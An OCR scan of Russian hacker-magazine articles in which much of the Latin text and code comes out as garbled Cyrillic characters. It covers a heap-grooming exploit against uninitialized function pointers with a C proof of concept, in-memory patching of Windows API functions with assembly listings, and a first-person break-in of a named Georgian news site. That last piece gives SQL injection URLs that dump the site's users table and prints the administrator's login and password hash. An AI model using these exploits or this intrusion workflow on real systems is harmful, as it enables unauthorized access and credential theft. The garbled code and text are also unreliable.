и как можно ее повысить — мы еще расскажем, а пока подведем краткий 
итогпричин возникновения неинициализированных переменных. 

• Вынос инициализирующего кода из конструктора (вызывае- 
мого автоматически) в метод (ы) -инициализаторы, вызывае- 
мые вручную или не вызываемые вообще 

• Гибридное Си/Си++ программирование с «эмуляцией» вир- 
туальных функций посредством чистого Си 

• Объекты с многочисленными ргорегбіез, инициализируемы- 
ми из закрепленных за ними методов 

• Разнотравье неклассифицируемых ошибок 

Н НЕДОСТРОЕННЫЕ ОБЪЕКТЫ НА СТЕКЕ 

Неинициализированные переменные встречаются нетолько в куче, но 
и на стеке. Взять хотя бытакое интересное явление, какавтоматическая 
инициализация глобальных и статических переменных, обращаемых в 
ноль еще не стадии загрузки исполняемого файла в память (потому «іпб 
а = 0;»и«збаСіс а ;» содержат в себе одно и то же значение). Писать 
«збабіс а = 0 ; » совершенно необязательно. 

Однако, если по каким-то причинам программист вдругудалит ключевое 
слово збаСіс, превращая переменную «а» из статической в автомати- 
ческую, в нейтутже окажется мусор, оставленный на стеке кем-то еще, и 
программа пойдетв разнос. Конечно, такое случается нетакужчасто, и 
компилятор начнет ругаться матом, выдавая ѵѵагпіпд’и, носовременные 
программисты на предупреждающие сообщения не смотрят. Компилиру- 



ется — и ладно. Да и стековых переменных намного больше, чем членов 
объекта, размещаемых в динамической памяти, а потому вероятность 
нарваться на неинициализированную переменную здесь выше. 
Ксожалению (или ксчастью — смотря с какой стороны смотреть), воз- 
можности направленного воздействия на стековые переменные очень 
ограничены, а сама атака весьма специфична и заслуживает отдельной 
статьи. Отложим этот разговор до лучших дней, а пока вернемся к куче и 
посмотрим: что там можно сделать. 

Н РЕАЛИЗАЦИЯ НАПРАВЛЕННОЙ АТАКИ 

Указатели составляют малую часть отвсехтипов переменных, но мы 
сосредоточимся именно на них. Более того, из всех указателей нас будут 
интересовать только указатели на функции, поскольку они намного более 
уязвимы, чем все остальные. Достаточно просто «дотянуться» до не- 
инициализированного указателя на функцию, записавтуда адрессвоей 
функции (збеіі-кода), а все остальное за нас сделаетавтоматика. Но даже 
такое с виду простое мероприятие реализуется довольно экзотическим 
способом в стиле «недокументированные позиции кама-сутры». 

Как мы уже говорили, стандартный аллокатор приплюснутого си разме- 
щаетобъекты в динамической памяти (куче). Причем, для достижения 
максимальной производительности обнуление выделенных блоков па- 
мяти не производится итам оказывается мусор. А что такое мусорсточки 
зрения программиста? Правильно, отходы жизнедеятельности преды- 
дущих объектов. Другими словами, возможность (хотя бы теоретическая) 
воздействия на неинициализированныеуказатели у насесть. Правда, 
практическая реализация наталкивается на множество подводных кам- 
ней и прочих препятствий. Но давайте все по порядку. 

Идея такова: выделяем блок памяти (что можно сделать напрямую из 
.^ѵаЗсгірІ: или ѴВЗсгірІ:), копируем туда збеіі-код, после чего отъедаем 
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всю память, заполняя ее указателями на наш зЬеІІ-код. И когда память 
совсем подойдет к концу, освобождаем все блоки, кроме первого (с 
зЬеІІ- кодом). Последующие запросы на выделение памяти возвратят уяз- 
вимому приложению блок, заполненный ссылками на збеЦ-код. Если хотя 
бы один из указателей объекта окажется неинициализированным, вместо 
вызова оригинальной функции управление получит зИеІІ-код. Описанная 
техника очень похожа на Ьеар-зргау — известный механизм атаки на 
переполняющиеся буфера, заканчивающейся передачей управления на 
збеИ-код. Присмотревшись внимательнее, мы обнаружим существенное 
различие. В классическом Ьеар-зргау’е выделенные блоки не освобож- 
даются, а в нашем — освобождаются все блоки, кроме первого, ста ким 
расчетом, чтобы быть использованными повторно! 

Авоттеперьграбли. Памятиу современных компьютеров много и быстро 
откушать ее не удастся. Атака растягивается на минуты или даже десятки 
минут, демаскируя хакера. У жертвы естьхороший запас по времени, что- 
бы закрыть подозрительно ведущее себя приложение (ІЕ при этом какбы 
«подвисает»), Нодаженеэто самое страшное. Поумолчанию, начальный 
размер файла подкачки меньше конечного и в большинстве систем он 
составляет меньше 2х гигабайт — объема памяти, выделенного каждому 
процессу под прикладные нужды. Следовательно, в процессе пожирания 
памяти неизбежно наступает момент, когда система начнетувеличивать 
размер файла подкачки. Это происходит не мгновенно и запросы на 
выделение памяти, осуществляемые в это время (даже поступающие от 
посторонних приложений), заканчиваются возвращением ошибки. Что 
касается стека — система вообще выбрасывает исключение «исчерпа- 
ние стековой памяти», которое мало кто обрабатывает. Короче говоря, в 
процессе увеличения файла подкачки начинаютсыпаться совершенно 
посторонние приложения и пользователь, чертыхаясь, отправляет 
систему на перезагрузку, в результате чего хакерская атака накрывается 
медным тазом. 

А как насчет более элегантного сценария? Тут по ходу дела выясняется 
одна очень интересная вещь. Даже если отъесть всю доступную память, 
а затем ее освободить, то никаких гарантий перезаписи неинициализи- 
рованного указателя у нас нет. Почему? А все потому, что мы выделяли 
память большим блокам. Если размер выделяемого блока превосходит 
размеруязвимого объекта, то система, стремясь подобрать блок наибо- 
лее адекватных размеров, выделит память совсем из других резервов 
— списка маленьких блоков. Ранее занятых, а теперь освобожденных, но 
таки не сумевших объединиться с остальными свободными блоками в 
единое целое (поскольку на пути между ними имеется один или больше 
занятых блоков, разрывающих единое адресное пространство на мно- 
жество обособленных суверенных «островков»). 

Выходит, что для достижения успеха, необходимо выделять блоки памяти 
предельно компактного размера (4 байта) стаким расчетом, чтобы туда 
записать один-единственный указатель на збеИ-код? Ну, это вообще 
дохляк! Дело в том, что размер выделяемого блока автоматически 



округляется до определенной величины, зависящей отособенностей 
реализации конкретного библиотечного аллокатора, опирающегося в 
свою очередь на аллокатор операционной системы. Обычно это — 1 6, 32 
или 64 байт. Причем, часть этой памяти (какминимум, два двойныхслова) 
расходуется под служебные нужды — указатели наследующий и преды- 
дущий свободный (занятый) блок, и потому первыедва двойныхслова 
для хакерских махинаций недоступны. На самом деле, доступны и они, 
но это опять-таки тема отдельной узко специфичной статьи, заточенной 
под определенные версии определенных библиотек, а нам хотелось бы 
познакомиться суниверсальным алгоритмом. 

И такой алгоритм действительно есть! Достаточно, чтобы размер выде- 
ляемых нами блоков памяти совпадал с размером уязвимого объекта. 
Тогда отъедать всю доступную память уже не потребуется. Вполне хватит 
нескольких сотен (максимум — тысяч) выделенных блоков, что в общей 
совокупности дает порядка одного-двух мегабайт памяти. Как говорится, 
— меньше, чем совсем ничего. Атака совершается быстро, надежно и 
незаметно. Жертва даже пикнуть неуспевает, какееуже щемятпо полной 
программе. Кстати, о программах. Ниже приведен тестовый стенд, 
демонстрирующий технику использования неинициализированных 
указателей в хакерских целях. 

ИСХОДНЫЙ КОД, ДЕМОНСТРИРУЮЩИЙ РЕАЛИЗАЦИЮ НАПРАВЛЕН- 
НОЙ АТАКИ НА НЕИНИЦИАЛИЗИРОВАННЫЕ УКАЗАТЕЛИ 

#сІебіпе М (2048) 

// #сіебіпе N32 (4096) // <— Ьай 

Мебіпе N82 ( зЫеоб ( збгисб обдесб)) // <-- доосі 

б_ок ( ) { ргіпбб ( "+ОК\п" ) ; } 
б_егг ( ) { ргіпбб ( " -ЕКК\п" ) ; } 
збгисб обдесб 
{ 

скаг *з ; 
іпб ( *Ьаг ) ( ) ; 
іпб ( *боо) ( ) ; 

} ; 

скаг Ъиб [1023 ] ; 
сітаг** а11_р[ЫШГ] ; 

гпаіп ( ) 

{ 

збгисб обдесб *ОЬ^ ; 

іпб а, Ь; с 'па г *зке11, **р; 

// аббаск 

зкеіі = (скаг* ) таііос ( 1024 ) ; 

*зке11 = ОхСС; 

// аііосабе кеар Ыоскз апсі бііі бкет Ыбк роіпбегз ко 
оиг зкеіі-сосіе 

бог (а = 0; а < N№1; а++) 

{ 

р= (скаг**) та11ос(№2); 
бог (Ь = 0 ; Ь < N82 / зізеоб (скаг*) ; Ъ++) 
р [Ь] = зкеіі ; 
а11_р [а] = р; 

} 

// бгее аіі Ыоскз бо гебигп бкет іп бке рооі 
бог (а = 0; а < №Ш; а++) 
бгее (а11_р [а] ) ; 

// ІЕ-1іке сосіе 

ОЪз = (збгисб окфесб*) таііос ( зігеоб ( збгисб окдесб) ) ; 
ОЪ:і->Ъаг = б_ок ; 

ѵДпіІе ( 1 ) 

{ 
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ідеСз (Ъи:І: , 1023 , зСсІіп) ; 

ІО ( зОгІеп (ЬиО) < 8) { ОЬз->Ооо(); сопСіпие; } 
0Ь^->3 = ЬиО ; ОЪ:і->Ъаг() ; 

Ьгеак; 

} 

} 

Конструктивно программа состоит из двух частей. Первая — реализует 
атакующий сценарий, вторая (начинается с комментария «ІЕ-Ііке собе») 

— имитируетуязвимый код, содержащийся, например, в ІЕ. Что касается 
збеіі-кода.то он представляет собой однобайтовую машинную команду 
ШТ ОЗЬ. с опкодом ОСЬ (программная точка останова, отлавливаемая 
отладчиком типа ОНуйбд или 5оШСЕ). В последнем случае необходи- 
мо отдать команду «ІЗНЕКЕ оы», чтобы 5оШСЕ реагировал наточки 
останова, установленные в пользовательских приложениях, а нетолько 
драйверах, какой это делает по умолчанию. 

Естественно, шт ОЗЬ. — не очень интересный збеіі-код и потому с 
практической точки зрения намного полезнее стянуть готовый збеіі-код с 
теІазроЕсот . открывающий Ьаскбоогили запускающий «Калькулятор». 
Но это уже технические детали, не имеющие кописываемому сценарию 
атаки ни малейшего отношения. 

Атаки на неинициализированные указатели только начинаются! К 
счастью для пользователей и большому хакерскому разочарованию, 



их очень легко предотвратить. Достаточно заставить аллокатор ав- 
томатически очищать выделяемые блоки памяти. Поскольку боль- 
шинство приложений взаимодействуют с системным аллокатором не 
напрямую, а через библиотечные переходники типа та Нос и пеѵѵ, то 
для защиты потребуется перекомпиляция всего ранее написанного 
кода. Вывод: определенный запас по времени у хакеров все-таки есть 
— весь вопрос в том, успеютли они им воспользоваться. ПЕ 



БЕР и борьба с ним 

Процессоров, поддерживающих ЫХ/ХЛ-биты, с каждым днем ста- 
новится все больше и больше, а начиная с ХР 5Р2, исполнение кода 
на стеке и в куче разрешено только для несистемных приложений. 
ІЕ, увы, не попадает в категорию «амнистированных» и потому 
приходится осуществлять дополнительные телодвижения. Какие 
именно — зависит от специфики уязвимого приложения и опять- 
таки далеко выходит за рамки сценария атаки на неинициализи- 
рованные указатели. Стало быть, в нашем контексте заслуживает 
лишь беглого упоминания. 



► обо 
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МОДИФИКАЦИЯ АРІ-ФУНКЦИИ КОНКРЕТНЫМ ПРИЛОЖЕНИЕМ 



Вспомни, тебе когда-нибудь требовалось изменить функциональность АРІ, 
вызываемой из системной библиотеки? При этом нередко случается так, что 
модификация ОБЬ «в лоб» (с сохранением изменений в файле библиотеки), 
невозможна. К счастью, есть другие методы, позволяющие эффективно ме- 
нять код АРІ-функций по своему усмотрению. Без особых трудностей моди- 
фицировать можно даже системную БЫ,. Заинтересовался? Тогда читай. 



уществуетдва подхода к реверсингу динамически загружа- 
емых библиотек. Первый — отлаживать ^[[«непосредствен- 
но», то есть — загружая ее в отладчике помощью некоторого 
вспомогательного процесса. Второй — отлаживать необ- 
ходимую библиотеку в контексте реального процесса. У второго способа 
есть неоспоримое преимущество — на конкретную АРІ-функцию можно 
поста вить точку останова и при передаче программой параметров в стек 
проследить за механизмом ее работы. Именно поэтому я предлагаю при 
отладке сІИ пользоваться вторым методом. 

Н САМЫЙ НАДЕЖНЫЙ МЕТОД 

С методом отладки определились. Возникает вопрос, — каким образом 
применить изменения, которые мы совершим во время отладки? Вари- 
антов масса. Почти каждому придет на ум сохранить измененную б II. Этот 
вариант практически никогда не годится! Подумай сам: как будут чувст- 
вовать себя программы, которые используют модифицированную сІІ[? 
Думаю, что многочисленных ошибок не избежать. Ктомуже, антивирусы 
могут заподозрить что-то неладное. Есть альтернативный путь: сохранить 
сІИ под другим именем и изменитьтаблицу импорта целевой программы 
так, чтобы вызывалась АРІ-функция не оригинальной, а модифицирован- 



ной библиотеки. Нотогда придется таскать за собой лишний файл, что 
тоже не всегда приемлемо. Третий вариант: модифицируем сІИ, загружен- 
ную в память, прямо из программы, которая ее использует. Хотя этот метод 
тоже может расцениваться антивирусами какдействие вредоносного 
характера, он менее заметен. Наконец, четвертый, самый надежный 
(но и самый сложный) метод — перенос исполняемого кода конкретной 
АРІ-функции втело программы. Тут анти в прусам придраться будетне к 
чему. Так как первые два метода довольно просты, да и скрыть «деяние» 
невозможно, рассмотрим два последних способа. 

г патчинг он. с применением ѵіктиАі_ркотЕСт 

Попробуем внедриться втело сШ, загруженной процессом, и изменить ее, 
что называется, «изнутри». Отлаживать будем файлик, который вызывает 
АРІ-функциюМеззадеВохА. Ты можешь найти программу, которую 
отлаживал я, на нашем 0Ѵ0, но вообще, подойдетлюбой. Попробуем 
поменять местами параметры, которые принимает функция. Сначала 
взглянем на них, протрассировав по <Р7> до инструкции «саіі изег32 . 
МеззадеВохА» и попав втело библиотеки изег32 . <311: 

РІІЗН О ; ЬапдиадеІБ = О 
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РАСЕ Функция уже перенесена в секцию кода, но нуждается в патчинге 



Вот что рассказала нам Місгозоіі о функции ѴігІиаІРгоІесІ: 



РІІЗН ШОКБ РТК. 83: [ЕВР+14] 
РБЗН ШОКБ РТК 88: [ЕВР+10] 
РІІЗН ШОКБ РТК 88: [ЕВР+С] 
РЕГЗН ШОКБ РТК 83: [ЕВР+8] 
САЬЕ изег32 .МеззадеВохЕхА 



; I Збуіе 
; | ТІСІе 
; | Техб 
; I ЬОѵзпег 
; МеззадеВохЕхА 



Поменяем местами атрибуты «ТіФе» и «Тех!» (то есть заголовок окна и его 
текст]. Для этого просто поменяем инструкцию, расположенную по адресу 
7ЕЗА05С1 на инструкцию, которая находится по адресу 7ЕЗА05С7, — и 
наоборот. Я думаю, ты знаешь, что внести необходимые изменения мож- 
но в окне, которое появляется подвойному щелчкулевой кнопки мыши 
на нужной команде. Теперь выделимтри инструкции, начиная с адреса 
7ЕЗА05С1, и из меню правой кнопки мыши выберем «Віпагу Віпагу 
сору» для получения машинных кодов измененных инструкций (почему 
три инструкции, а не две, я объясню позже]. 

В буфер обмена будет помещен следующий код: ЕЕ 75 ОС ЕЕ 75 10 ЕЕ 
75 08. Последний байт нам не нужен, — его отрезаем. Останется восемь 
необходимых нам байт. Второезначение, которое понадобится в ходе 
выполнения задачи: адрес, начиная с которого размещены измененные 
инструкции: 7ЕЗА05С1. 

Итак, почемуже мы скопировали машинный код, состоящий из восьми 
байт, хотя модифицировали инструкции только в пределах шести байт? 
Все очень просто — оперировать с данными мы будем, используя четы- 
рехбайтные регистры. Соответственно, и писать в память мы будем по 4 
байта. Минимальное число, кратное четырем и больше шести, — вось- 
мерка. 

Приступим к модификации программы. Перезапускаем отлаживаемый 
процесс. Вызов функции Мез задеВохА, располагающийся по адресу 
0040100Е, заменяем на безусловный переход: ^шр 00401026 (начиная 
с этого адреса, будет располагаться написанный нами код]. Ксожалению, 
системные библиотеки, располагающиеся в контексте процесса, защи- 
щены отзаписи (страницы памяти, в которой размещена би, имеют атри- 
бут «геа ба Ые»]. Нам необходимо выставить атр и бут «КУ7Е», — разрешить 
запись в область памяти. Легче всего проделать это при помощи вызова 
системной функции ѴігІиаІРгоІесІ с соответствующими параметрами, 
переданными в стек. Вот ее прототип: 



бипсбіоп ѴігбиаІРгобесб ( 

ІрАсМгезз: Роіпбег; // начальный адрес области памяти 
быЗізе: БѴЮКБ; // размер области памяти 

ОІМеыРгобесб : ШОКБ; // новые атрибуты защиты 
ІрІІОІбРгобесб : Роіпбег // указатель на старые атрибуты 
) : ВООЬ; зббсаіі; оѵегіоаб; 



Первый параметр — адрес, с которого начинается область памяти, 
атрибуты страниц которой подлежат модификации. Второй параметр 



— размер этой области памяти (в нашем случае — 8 байт]. Третий — байт- 
код, представляющий собой новые атрибуты для области памяти. Из 
справочной литературы или с помощьютакой утилиты, какІ_огсІРЕ, 
узнаем, что значение, соответствующее атрибуту « РѴѴЕ», будет равно 406. 
Наконец, последний параметр — это указатель на переменную, которая 
содержит старые атрибуты. В качестве этого параметра в стек можно 
положить любой адрес, по которому находится нулевая переменная. Я 
выбрал адрес 00401060. Естественно, в стек все параметры кладутся, 
начиная с последнего. 

Чуть раньше мы получили машинный код измененных библиотечных инс- 
трукций. Поместим их втеле нашей программы. Выделяй восемь байт, 
начиная садреса 00401100, и нажимай <сігІ+е>. После чего в нижнем 
поле появившегося окна вписывай сохраненные нами ранеезначе- 
ния. Подтверждай изменения нажатием на кнопку«0к». Самое время 
написать код, который будет «патчить» системную библиотеку. Здесь все 
предельно просто: в регистр ЕАХпри помощи команды моѵ будем поме- 
щать данные, которые необходимо записать поверх оригинального кода 
АРІ-функции. В регистр ЕВХ с помощью той же инструкции МОѴ положим 
адрес, по которому будем производить запись (его мы также получили 
ранее, — 7ЕЗА05С1]. Производитьзапись будем при помощи инструкции 
МОѴ [ЕВХ], ЕАХ. После этих манипуляций необходимо вызвать функцию 
МеззадеВохА, которая была модифицирована, и передать управление 
на инструкцию, следующую сразу за командой безусловного перехода на 
наш код. Последнее замечание — необходимо сохранить все регистры 
перед началом выполнения нашего кода и возвратить их в исходное со- 
стояние после его выполнения при помощи пары команд ризЬасІ/рорасІ. 

В результате получим следующий код: 

РІІ8НАБ 

РБЗН 00401060 ; указатель на нулевой байт — параметр 

" ІрПЮІбРгобесЦ " 

МОѴ ЕАХ, 40 ; Помещаем в ЕАХ параметр " ІШеыРгобесб " , 
который разрешает запись в область памяти, где распола- 
гается наша ВЬЬ 

РІІ8Н ЕАХ ; кладем параметр в стек 

РІІ8Н 8 ; параметр сЫВіге 

РІІ8Н 7ЕЗА05С1 ; параметр ІрАббгезз 

САШ ѴігРиаІРгобесб ; вызываем ѴігбиаІРгобесб 

МОѴ ЕАХ, [40110 0] ; кладем в еах первые 4 байта машинного 

кода 

МОѴ ЕВХ , 7ЕЗ АО 5С1 ; адрес, куда запишется машинное слово 
МОѴ [ЕВХ] , ЕАХ ; записываем машинный код в тело АРІ-фун- 
кции 

МОѴ ЕАХ, [401104] ; помещаем в еах 4 последних байта ма- 
шинного кода 

МОѴ ЕВХ,7ЕЗА05С5 ; в еЪх помещаем адрес, по которому бу- 
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дет записано машинное слово 

МОѴ [ЕВХ] , ЕАХ ; записываем машинный код в тело АРІ-функ- 
ции 

РОРАБ; восстанавливаем регистры перед вызовом 

МеззадеВохА 

САЬЬ МеззадеВохА 

БМР 00401013 ; переходим к дальнейшему выполнению про- 
граммы 

Послетого, как введешь его, пронаблюдай результат выполнения про- 
граммы. Два атрибута АРІ-функцииМеззадеВохАпоменялись местами, 
причем в результате инлайн-патчинга кода библиотеки, располагающей- 
ся в памяти. 

Н ВОРОВСТВО КОДА 

Теперь представим на минуту, что у нас нет доступа к изменению атри- 
бутов страниц памяти. Пускай даже и есть, — любой антивирус может 
заподозрить, что процесс совершает какую-то гадость, если изменяет 
параметры памяти, где расположена системная библиотека. Здесь 
придется придумать нечто особенное. Я предлагаю перенести инструк- 
ции АРІ-функции, которую необходимо пропатчить, в свободную область 
секции кода нашей программы. Делается это элементарно: с помощью 
той же инструкции тоѵ, только помещенной в цикл. 

Для примера попробуем перенести в секцию кода и пропатчить туже 
самую функцию, что мы рассматривали ранее, —МеззадеВохА. Сначала 
выберем адрес, где будет базироваться перемещаемый код АРІ-функции. 
Пусть это — 00401100. Теперь откроем уже рассмотренный нами файл 
ех.ехе под ОИуОЬд и протрассируем код вплоть до вызова МеззадеВохА 
(куда зайдем по <Р7>]. Сделав несложный подсчет, определяем, что 



АРІ-функция занимаетв памяти 486 байт. Запомним! Также запишем на 
клочке бумаги базовый адрес функции — 7ЕЗА058А. Код, который будет 
считывать из памяти машинный кодАРІ и размещать его в секции кода 
программы, расположим по адресу 00401026. А значит, вызов САЬЬ 
<ВМР . &изег32 .МеззадеВохА> заменим инструкцией перехода к на- 
шему коду: БМР 00401026. Вот как будет выглядеть цикл, копирующий 
тело АРІ в секцию кода нашей программы: 

00401026 РБЗНАБ ; сохраняем регистры в стек 

00401027 МОѴ ЕАХ,7ЕЗА0588 ; базовый адрес АРІ-функции 
минус 2 байта 

0040102С МОѴ ЕСХ,48; есх — счетчик цикла, помещаем в ре- 
гистр размер АРІ-функции 

00401031 МОѴ ВХ, [ЕАХ+ЕСХ] ; помещаем в двухбайтовый ре- 
гистр ВХ 2 байта из тела АРІ-функции 

00401035 МОѴ [ЕСХ+4 01100] ,ВХ; записываем содержимое ВХ в 
память по адресу ЕСХ+401100 

0040103С ЗБВ ЕСХ, 2; уменьшаем значение счетчика на 2 
0040103Р ЦБ2 00401031; продолжаем выполнять цикл, если 
ЕСХ не равен нулю 

Каквидишь, код простой, но дам кое-какие комментарии. Почему мы по- 
местили в регистр ЕАХ не базовый адрес, а базовый адрес -2? В послед- 
ней итерации цикла значение счетчика ЕСХ будет равно 2, а 2+7ЕЗА0588 
и дает базовый адрес. Следующие инструкции последовательно, по 2 
байта, копируюттело АРІ-функции (соответственно, и счетчик мы устано- 
вили с шагом 2 — при помощи инструкции «ЗБВ ЕСХ, 2»]. 

Казалось бы, все сделано. Но запусктакого кода обречен на неудачу. 
Почему? Мы перенесли функцию, котораяжестко привязана кбазовому 
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Этот код исправил ситуацию, сделав перенесенную функцию работоспо- 
собной 



адресу, а это значит, что вызовы и инструкции типа «те!» становятся 
недействительными. Чтобы придать перенесенному коду работоспособ- 
ность, придется его пропатчить. Для начала получим машинные коды, 
которые будем «накладывать» на перемещенную АРІ-функцию, исправ- 
ляя проблемные места. Поставь точку останова по адресу 00401041 
и запусти программу на исполнение (<Р9>). После смело переходи по 
адресу 00401100, чтобы посмотреть, какие области перенесенного кода 
нуждаются в патчинге. 

Нас интересуют четыре инструкции, которые мешают нормальной работе 
функции. Первая — команда помещения в стекза головка окна, параметр 
не передается. Вот как выглядит инструкция: 

00401136 РБЗН [ЕВР+14 ] 

Та же ситуация — и с инструкцией, передающей параметр-хэндл роди- 
тельского окна. 

0040113Е РБЗН [ЕВР+8 ] 

Обе этих команды при патчинге будем заменять инструкцией РІІ5Н 0. 
Машинный код этой инструкции выглядит как 6А00. Намотаем наус. 
Следующая инструкция, которая была испорчена при переносе кода АРІ- 
функции, — ВЫЗОВ Мез задеВохЕхА: 00401142 САШ 00401174. 

Ее также следует пропатчить! Машинный код, необходимый для этого, 
получим так: дважды нажмем на инструкцию, расположенную по адре- 
су 00401142, левой кнопкой мыши и в появившемся окне введем «саіі 
Мез задеВохЕхА» (без кавычек]. После этого нажмем на исправленную 
инструкцию правой кнопкой мыши и из контекстного меню выберем 
«Віпагу-^ Віпагу сору». Вот полученный четырехбайтный машинный 
КОД: Е8В5Е4Е97Б. 

Последняя инструкция, с которой следует«разобраться», — это операция 
возврата: 00401148 кете 10 

Заменим ее переходом косновному коду программы («бМР 00401013») 
и затем получим машинные коды этой инструкции при помощи той же 
команды «Віпагу-^ Віпагу сору». Код этой инструкции: Е9С6РЕРРРР. 
Самое время написать код, который будет совершать патчинг. Если учесть, 
чтоу нас есть машинные коды инструкций и адреса, по которым необходимо 
их записать, то исправляющий код будет выглядеть очень просто. Единст- 
венная ремарка: в память патч-код будет помещаться «задом наперед», 
начиная с «хвоста» регистра и заканчивая его «головой». Значит, в регистр 
машинные коды будем заносить, предварительно «перевернув их». 

Для первыхтрех инструкций патч-код будет выглядеть следующим 
образом: 

00401041 МОѴ ЕАХ , ЕЕ9 0 0 0 6А ; помещаем патч-код для первой 
инструкции (задом наперед) в регистр ЕАХ 



0040104 6 МОѴ ЕВХ, 0 040113 6 ; помещаем в ЕВХ адрес, по кото- 
рому будем записывать машинный патч-код 

0040104В' МОѴ [ЕВХ] , ЕАХ ; записываем содержимое регистра 
ЕАХ по адресу, помещенному в ЕВХ 
; аналогично — для второй и третьей инструкций: 

0040104Б МОѴ ЕАХ, Е89 0006А 
00401052 МОѴ ЕВХ, 0040113Е 
00401057 МОѴ [ЕВХ] , ЕАХ 
00401059 МОѴ ЕАХ , 7 БЕ 9 Е4 В 5 
0040105Е МОѴ ЕВХ, 00401143 
00401063 МОѴ [ЕВХ] , ЕАХ 

Патч-код для инструкции «геб» состоит из пяти байт, а регистр — четы- 
рехбайтовый. Разобьем операцию патчинга на два подхода: 

00401065 МОѴ ЕАХ , ЕЕЕЕС6Е9 ; помещаем в ЕАХ четыре байта 
патч-кода 

0040106А МОѴ ЕВХ, 00401148 ; помещаем адрес в ЕВХ 
0040106Р МОѴ [ЕВХ] , ЕАХ ; записываем патч-код 
00401071 МОѴ ЕАХ , 0ЕЕ ; помещаем в ЕАХ оставшийся, послед- 
ний, байт патч-кода 

0040107 6 МОѴ ЕВХ, 0040114С ; в ЕВХ помещаем адрес 
0040107В МОѴ [ЕВХ] ,ЕАХ; патчим 

Код почти готов. Осталось восстановить регистры командой рораб и 
передать управление перенесенной в секцию кода и исправленной АРІ - 
функции МеззадеВохА (инструкцией БМР 00401102). Вот как выглядит 
написанный нами код целиком: 

00401026 РБЗНАБ 
00401027 МОѴ ЕАХ, 7ЕЗА0588 
0040102С МОѴ ЕСХ, 48 
00401031 МОѴ ВХ, [ЕАХ+ЕСХ] 

00401035 МОѴ [ЕСХ+401100 ] , ВХ 
0040103С ЗБВ ЕСХ, 2 
0040103Е ББ2 00401031 
00401041 МОѴ ЕАХ, ЕЕ90006А 
00401046 МОѴ ЕВХ, 00401136 
0040104В МОѴ [ЕВХ] , ЕАХ 
0040104Б МОѴ ЕАХ, Е89 0006А 
00401052 МОѴ ЕВХ, 0040113Е 
00401057 МОѴ [ЕВХ] , ЕАХ 
00401059 МОѴ ЕАХ , 7 БЕ 9 Е4 В 5 
0040105Е МОѴ ЕВХ, 00401143 
00401063 МОѴ [ЕВХ] , ЕАХ 
00401065 МОѴ ЕАХ , ЕЕЕЕС6Е9 
0040106А МОѴ ЕВХ, 00401148 
0040106Е МОѴ [ЕВХ] , ЕАХ 
00401071 МОѴ ЕАХ, 0ЕЕ 
00401076 МОѴ ЕВХ, 0040114С 
0040107В МОѴ [ЕВХ] , ЕАХ 
0040107Б РОРАБ 
0040107Е БМР 00401102 

Если все было сделано правильно, перенесенная АРІ будет работать. 

Этот метод замечателен тем, что мы можем какугодно модифицировать 
кодАРІ, не имея возможности изменить атрибуты страниц памяти, где 
расположена системная библиотека. 

Н КОНЕЦ?! 

Естественно, это не конец, ибо существует масса интересных идей. 
Технические возможности огромны, ум реверсера остер, а совер- 
шенных защитных механизмов не существует. О многих методах 
патчинга АРІ мы еще расскажем, до других ты, наверняка, додума- 
ешься сам. Все зависиттолько оттвоего воображения. Удачи во 
взломах! ПС 
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Ни не секрет, что все события находя'^^эажение в 

Сети. «Яыло во время нападе^^^^^^жстов на Нальчик в позапрошлом 
году (вспомним массовые атаки^^^^^^КавказЦентра). Так произошло и 
во время августовских событий в Южной Осетии. Кибер-войны стали не- 



отъемлемой частью реальных, кровопролитных, событий. Хорошо это или 
плохо — каждый решает сам. Но мы, хакеры, решили — что плохо! 



ирное распитие пива в сочетании с пролистыванием 
башорга было неожиданно прервано экстренными вы- 
пусками новостей о ходе развития грузино-осетинского 
конфликта. Просмотрев новостные ленты иубедившисьв 
бесполезности уподобления участникам политических баталий, я решил 
прошерстить несколько государственных и информационных ресурсов в 
доменной зоне .6Е. 

И АТАКУЕМ СМИ 

Как известно, ни одно крупномасштабное событие не обходится без 
участия средств массовой информации. В свою очередь, они активно 
используют интернет для передачи своего видения происходящего. 

Да, ты неослышался, именно «своего видения», ибокаждоеСМИ 
публикует исключительно то, что хочет (или что подсказали]. Абсолютно 
противоположные взгляды российских и западных/грузинских изданий 
побудили меня глубже вникнуть в ситуацию, со всеми вытекающими 
отсюда последствиями :). В качестве первого объекта для установления 
информационного баланса на просторахзоны .СЕ был выбрал ресурс 
ѵѵѵѵѵѵ.ргега.де . Название домена говорит само за себя, поэтому я не стану 
описывать контент сайта. Скажу лишь, что, поданным Гугла, портал 
имеет РП 5. После «Веѵегзе ІР» сервера стало понятно, что сайтхостится 
в Грузии и имеет поддомен рба.ргеза.де . Поработав с движком ресурса 
ѵѵѵѵѵѵ.ргеза.де . через некоторое время я отыскал типичный зді-инъект, 
который имел вид: 

ГШСр : / /члллм.ргеза . де / іпсіех. рЬр?ЦехЦ=петлгз&і = -1+зд1- запрос 

Функции изег() и ѵегзіопО выдали достаточно радужную для меня инфу: 

► 066 



изег() — ргеза_де@1оса1ГюзС 
ѵегзіоп ( ) —5.0.51 

Версия мускула была выше 5, и, следовательно, перебортабличек не 
представлял собой ничего сверхъестественного: 

ГШРр : //чалам. ргеза . де/іпсіех . рЪр?ЦехЦ=пемз&і=- 
1+ипіоп+зеІесС + 1 , 2 , СаЫе_паше ,4,5,6,7,8,9,10, 11+ігот+і 
п1огтаСіоп_зс]тета . СаЫез + ІітіР+2 1,1-- 

К моемуудивлению, табличка «изегз» имела всего одну запись: 

ГШСр : //ѵчпАм.ргеза . де/іпсіех . рЪр?ЦехЦ=пемз&і=-1+ипіоп+зе1 
есС+1 , 2 , соипР ( * ) ,4,5,6,7,8,9,10, 11+ігот+изегз-- 

Тем не менее, логин и па роль удалось за получить без особых проблем: 

ГШРр : //ѵчлАм.ргеза . де/іпсіех . рЪр?ЦехЦ=пемз&і=-1+ипіоп+зе1 
есС + 1 , 2 , сопсаС (изег_изегпате , сііаг ( 58 ) ,изег_раззѵ\гогсі) ,4 
,5,6,7,8,9,10, 11+ігот+изегз+1ітіР+0 , 1-- 

Асам аккаунт имел вид: 

ргеза . де : с1аЬ2 83 404Ь71а940 807 009 023а7 64Ьсі 

Судя по хэшу, пасс был шифрован тсіб-алгоритмом, что при правиль- 
ном подходе не сулило ничего сложного. Огорчало другое, — мнетак и 
неудалось найти месторасположение админки либо формочки логина 
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пользователей. Сканирование доступных для просмотра каталогов на 
сервере результатов также не принесло. А ІоасИіІеО в мускуле упорно 
отказывался работать (видимо, по причине отсутствия прав). 
Поразмыслив, я запустил брут добытого хэша (с1аЬ283404Ь71а9408070 
